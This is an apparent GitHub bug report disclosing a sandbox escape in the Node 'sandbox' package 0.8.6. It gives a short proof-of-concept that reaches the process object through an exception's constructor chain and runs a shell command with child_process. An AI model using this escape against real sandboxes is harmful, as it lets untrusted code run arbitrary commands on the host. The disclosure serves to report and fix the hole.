
Sandbox Escape Bug

Open seongil-wi opened this issue 2 years ago • 0 comments

  • Sandbox version: 0.8.6
  • Node version: 18.15.0
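
```js
var Sandbox = require("sandbox")

// Untrusted code handed to the sandbox as a string.
var code = `
    try {
        toLocaleString()
    } catch (pp) {
        // The caught exception's constructor chain reaches the process object.
        pp.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch flag');
    }
`

var s = new Sandbox()
s.run(code)
```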

We found a sandbox escaping bug. This bug can be triggered by calling the toLocaleString() function. Also, we can execute arbitrary shell code using the process module.

seongil-wi, Mar 30 '23 07:03